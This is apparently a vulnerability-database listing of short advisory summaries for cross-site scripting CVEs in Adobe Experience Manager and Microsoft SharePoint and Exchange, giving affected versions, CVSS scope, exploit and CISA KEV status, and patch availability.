Stored Cross-Site Scripting in Adobe Experience Manager allows a low-privileged authenticated attacker to inject persistent malicious JavaScript into vulnerable form fields, which executes in the browsers of other users - including higher-privileged ones - who subsequently visit the affected page. Affected versions span 6.5.24, LTS SP1, and 2026.04 and earlier. The CVSS Scope:Changed designation indicates that successful exploitation can impact components beyond the attacker's privilege boundary, elevating the practical impact of an otherwise medium-severity finding. No public exploit code exists and this CVE is not listed in the CISA KEV catalog at time of analysis.
Stored Cross-Site Scripting in Adobe Experience Manager (AEM) 2026.04 and earlier allows an authenticated low-privileged attacker to permanently inject malicious JavaScript into vulnerable form fields within the CMS. When any user - including administrators - browses to the page containing the poisoned field, the script executes in their browser under AEM's origin, with scope change (S:C) enabling the attacker to affect browser context beyond AEM's own security boundary. No public exploit code or CISA KEV listing has been identified at time of analysis; however, the low access complexity and persistent nature of the payload make this a credible threat in multi-tenant or contributor-accessible AEM environments.
Stored Cross-Site Scripting in Adobe Experience Manager allows a low-privileged authenticated attacker to inject persistent malicious JavaScript into vulnerable form fields, which executes in the browsers of other users who visit the affected page. Affected versions span the 6.5.x branch (through 6.5.24), the LTS SP1 track, and the cloud-native 2026.04 release and earlier. The scope-changed CVSS rating reflects that the injected payload crosses the security boundary from the attacker's session context to arbitrary victim sessions, enabling session hijacking, credential harvesting, or UI redress attacks against higher-privileged users. No public exploit code has been identified at time of analysis, and no CISA KEV listing is present.
Stored Cross-Site Scripting in Adobe Experience Manager (AEM) versions 6.5.24, LTS SP1, and 2026.04 and earlier enables a low-privileged authenticated attacker to persist malicious JavaScript in vulnerable form fields, executing in the browser of any user who subsequently views the affected page. The CVSS Scope Changed (S:C) designation confirms the injected script crosses trust boundaries, meaning payloads can target administrator sessions, exfiltrate tokens, or perform privileged actions beyond the AEM application context. Adobe has published advisory APSB26-56 addressing this issue; no public exploit has been identified at time of analysis.
DOM-based Cross-Site Scripting in Adobe Experience Manager (AEM) versions up to and including 6.5.24, LTS SP1, and 2026.04 allows an authenticated low-privileged attacker to inject and execute arbitrary JavaScript within a victim's browser by manipulating the client-side DOM environment through a crafted webpage. Successful exploitation results in a scope change (S:C), meaning attacker-controlled script can reach resources beyond the vulnerable AEM component - such as session tokens or cross-origin content accessible to the victim. No public exploit code has been identified at time of analysis and this CVE is not listed in CISA KEV, though Adobe's own PSIRT reported it under advisory APSB26-56.
DOM-based Cross-Site Scripting in Adobe Experience Manager (AEM) versions 6.5.24, LTS SP1, and 2026.04 and earlier allows an authenticated attacker to inject and execute malicious JavaScript within a victim's browser by manipulating the Document Object Model. The CVSS Scope:Changed rating signals that successful exploitation breaks out of the vulnerable component's security boundary, enabling impact on resources beyond AEM itself - such as adjacent browser sessions or stored credentials. No public exploit identified at time of analysis, and CISA KEV listing is absent, but the low attack complexity and changed scope make this a meaningful risk for organizations running AEM with untrusted low-privilege users.
Stored Cross-Site Scripting in Adobe Experience Manager (AEM) versions 6.5.24, LTS SP1, and 2026.04 and earlier allows a low-privileged authenticated attacker to inject malicious scripts into vulnerable form fields, which then execute in any victim's browser when they navigate to the affected page. The Changed scope (S:C) in the CVSS vector confirms that impact escapes the vulnerable component and reaches the victim's browser context, enabling session hijacking, credential theft, or unauthorized actions on behalf of the victim. No public exploit identified at time of analysis, and the vulnerability is not currently listed in CISA KEV.
Stored Cross-Site Scripting in Adobe Experience Manager (versions up to 6.5.24, LTS SP1, and 2026.04) allows a low-privileged authenticated attacker to inject persistent malicious JavaScript into vulnerable form fields within the platform. When a higher-privileged user - such as an administrator or content editor - subsequently browses to a page containing the poisoned field, the injected script executes in their browser, enabling session hijacking, credential theft, or unauthorized actions on their behalf. No public exploit has been identified at time of analysis and the vulnerability is not listed in the CISA KEV catalog; Adobe has published advisory APSB26-56 to address this issue.
Stored Cross-Site Scripting in Adobe Experience Manager (AEM) versions up to and including 6.5.24, LTS SP1, and 2026.04 allows a low-privileged authenticated attacker to inject persistent malicious JavaScript into vulnerable form fields. When any user browses to the affected page, the script executes in their browser within a changed scope context, enabling session hijacking, credential theft, or unauthorized actions on behalf of the victim. No public exploit code has been identified at time of analysis, and the Adobe APSB26-56 advisory provides remediation guidance.
Stored Cross-Site Scripting in Adobe Experience Manager (versions 6.5.24, LTS SP1, and 2026.04 and earlier) permits a low-privileged authenticated attacker to persistently inject malicious JavaScript into vulnerable form fields, which then executes in any victim's browser upon visiting the affected page. The CVSS scope change (S:C) indicates the injected script can impact browser contexts beyond AEM itself - enabling session hijacking, credential harvesting, or UI redress attacks against higher-privileged users such as administrators. No public exploit has been identified at time of analysis, and CISA SSVC rates exploitation status as none with partial technical impact.
Stored Cross-Site Scripting in Adobe Experience Manager (versions 6.5.24, LTS SP1, 2026.04 and earlier) allows a low-privileged authenticated attacker to permanently inject malicious JavaScript into vulnerable form fields. When any user - including higher-privileged administrators - browses to the page containing the tainted field, the script executes in their browser under a changed scope (S:C), meaning the impact extends beyond the originating application context. No public exploit code or active exploitation via CISA KEV has been identified at time of analysis, but the low attack complexity and broad version range make this a realistic internal threat in multi-tenant AEM environments.
Stored Cross-Site Scripting in Adobe Experience Manager (AEM) versions 6.5.24, LTS SP1, and 2026.04 and earlier allows a low-privileged authenticated attacker to persistently inject malicious JavaScript into vulnerable form fields. When any user - including administrators - browses to the affected page, the injected script executes within their browser session. The CVSS Scope:Changed rating confirms the exploit crosses security boundaries: the attacker's injected payload affects victims beyond the attacker's own session, enabling session hijacking, credential theft, or privilege escalation in a CMS where administrators hold significant content control. No public exploit or CISA KEV listing has been identified at time of analysis.
Stored XSS in Adobe Experience Manager (AEM) versions 6.5.24, LTS SP1, 2026.04 and earlier allows a low-privileged authenticated attacker to persistently inject malicious JavaScript into vulnerable form fields via the AEM authoring interface. When any victim browses a page containing the compromised field, the injected script executes within their browser - the CVSS Scope Changed (S:C) flag confirms the impact crosses trust boundaries beyond the AEM application itself, enabling session theft or unauthorized actions on behalf of higher-privileged users. No public exploit identified at time of analysis; Adobe has published advisory APSB26-56 addressing this issue.
DOM-based Cross-Site Scripting in Adobe Experience Manager (AEM) versions 6.5.24, LTS SP1, 2026.04 and earlier allows a low-privileged remote attacker to execute arbitrary JavaScript in a victim's browser by manipulating the DOM environment through a crafted webpage. The changed scope (S:C in CVSS) means successful exploitation can affect resources beyond the vulnerable component itself, enabling session hijacking or credential theft against AEM users. Exploitation requires user interaction - the victim must be social-engineered into visiting an attacker-controlled or injected URL - and no public exploit or CISA KEV listing exists at time of analysis.
Cross-site scripting in Microsoft SharePoint allows an authenticated network attacker with low privileges to inject malicious script content into web pages, enabling spoofing attacks against other users. All three active SharePoint server product lines - Server 2019, Enterprise Server 2016, and Subscription Edition - are affected across broad version ranges. No active exploitation has been confirmed (not listed in CISA KEV) and no public exploit code has been identified at time of analysis; vendor-released patches are available for all affected product lines.
Cross-site scripting in Microsoft SharePoint allows an authenticated network attacker to inject malicious scripts into SharePoint-generated web pages, enabling spoofing attacks against other authenticated users. Affected products span three active SharePoint server product lines - Enterprise Server 2016, Server 2019, and Subscription Edition - all sharing the 16.0.x codebase, with vendor-released patches now available per MSRC. No public exploit identified at time of analysis, and the vulnerability is not listed in the CISA KEV catalog.
Cross-site scripting in Microsoft SharePoint Server enables network-based spoofing attacks by injecting malicious scripts into rendered web pages, requiring victim user interaction to trigger. Three SharePoint server product lines are affected across the 16.0.x code branch, with vendor-released patches available for all. No public exploit has been identified at time of analysis, and the vulnerability is not listed in CISA KEV.
Cross-site scripting in Microsoft SharePoint allows an authenticated low-privilege network attacker to inject malicious script content into SharePoint pages, enabling spoofing attacks against victim users who render the affected content. Three product lines are affected: SharePoint Enterprise Server 2016, SharePoint Server 2019, and SharePoint Server Subscription Edition, all at specific 16.0.x build levels. No public exploit code or CISA KEV listing has been identified at time of analysis; the CVSS 4.6 Medium score reflects meaningful risk reduction from the dual prerequisites of authenticated access and required victim interaction.
Cross-site scripting in Microsoft SharePoint Server (Subscription Edition, 2019, and 2016) enables an authenticated low-privileged attacker to inject malicious scripts into web pages served to other users, resulting in spoofing over the network. The CVSS vector (PR:L/UI:R/S:U) confirms exploitation requires valid credentials and victim interaction, constraining the attack surface to authenticated SharePoint environments where a user can be induced to visit attacker-controlled content. No public exploit identified at time of analysis, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog.
Cross-site scripting in Microsoft SharePoint Server (2016, 2019, and Subscription Edition) enables network-based spoofing attacks against authenticated users who interact with attacker-controlled content. The vulnerability stems from insufficient input neutralization during web page generation (CWE-79), allowing injected script to execute in a victim's browser context. No public exploit code has been identified at time of analysis, and a vendor-released patch is available via Microsoft's Security Response Center.
Stored or reflected cross-site scripting in Microsoft Office SharePoint allows an authenticated attacker with low privileges to inject malicious script that, after victim interaction, results in spoofing and disclosure or alteration of sensitive content within a victim's browser session. The CVSS 7.3 (AV:N/AC:L/PR:L/UI:R) rating reflects network-reachable exploitation with low complexity but requires both a valid SharePoint account and user interaction. No public exploit identified at time of analysis and the issue is not listed in CISA KEV.
Spoofing via reflected/stored cross-site scripting in Microsoft Exchange Server allows a remote unauthenticated attacker to execute attacker-controlled script in the context of a victim's authenticated Exchange session after the victim interacts with a crafted link or message. With a CVSS 3.1 base score of 8.1 (AV:N/AC:L/PR:N/UI:R) and high confidentiality and integrity impact, successful exploitation enables session hijacking, mailbox content disclosure, and message manipulation, though no public exploit identified at time of analysis and the issue is not listed in CISA KEV.
Privilege elevation via stored or reflected cross-site scripting in Microsoft Live Share Canvas SDK enables an authenticated attacker on the network to execute script in another user's browser context and gain elevated permissions within collaborative Live Share sessions. The CVSS 8.0 vector reflects high impact across confidentiality, integrity, and availability, though successful exploitation requires both low-level authentication and user interaction. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.
Cross-site scripting and server-side request forgery in Microsoft Exchange Server enables authenticated low-privilege network attackers to perform spoofing and exfiltrate sensitive information. Affected are Exchange Server 2016 CU23, 2019 CU14, 2019 CU15, and the Subscription Edition RTM release lines, all below their respective patched cumulative update builds. No public exploit identified at time of analysis and the vulnerability is not listed in the CISA KEV catalog, though Microsoft has released patches across all affected branches.
Cross-site scripting in Microsoft Exchange Server's web interface enables unauthenticated remote attackers to perform spoofing attacks against users of Exchange Server 2016, 2019, and Subscription Edition. The CVSS vector (PR:N/UI:R/S:C) indicates no attacker authentication is required, but a victim must interact with a crafted link, and the Changed Scope means injected scripts can cross browser security boundaries within the Exchange session. No public exploit has been identified at time of analysis, and vendor-released patches are available addressing all affected cumulative update branches.
Stored or reflected cross-site scripting in Microsoft SharePoint Server (the platform underlying Office Project Server) enables an authenticated low-privileged attacker to inject malicious script into web-rendered content, facilitating spoofing attacks against other users. The CVSS vector (PR:L/UI:R) confirms exploitation requires an authenticated account and victim interaction, constraining opportunistic use. No public exploit code has been identified at time of analysis, a vendor patch has been released, and no CISA KEV listing is present.
Stored or reflected cross-site scripting in Microsoft Office SharePoint allows an authenticated low-privileged attacker to inject script that executes in another user's browser session, enabling spoofing and high-impact disclosure or modification of data rendered in the victim's context. The CVSS 7.3 vector requires user interaction and existing access to the SharePoint site, and no public exploit identified at time of analysis. The flaw is consistent with the CWE-79 class of input neutralization failures during web page generation.
Cross-site scripting in Microsoft SharePoint allows an authenticated network attacker to perform spoofing attacks by injecting malicious script into web page content. Affected products include SharePoint Enterprise Server 2016, SharePoint Server 2019, and SharePoint Server Subscription Edition across all builds below their respective patched versions. No public exploit identified at time of analysis, and this CVE is not listed in the CISA KEV catalog; the CVSS score of 4.6 reflects the mandatory user interaction and constrained confidentiality/integrity impact.
Cross-site scripting in Microsoft SharePoint Server allows an authenticated low-privileged attacker to inject malicious scripts into SharePoint-generated web pages, enabling spoofing attacks against other authenticated users over the network. Three product lines are confirmed affected: SharePoint Server Subscription Edition, SharePoint Server 2019, and SharePoint Enterprise Server 2016, each with specific patched build thresholds. No public exploit code has been identified at time of analysis, and Microsoft has released patches for all three product lines.
Quick Facts
- Typical Severity
- MEDIUM
- Category
- web
- Total CVEs
- 38829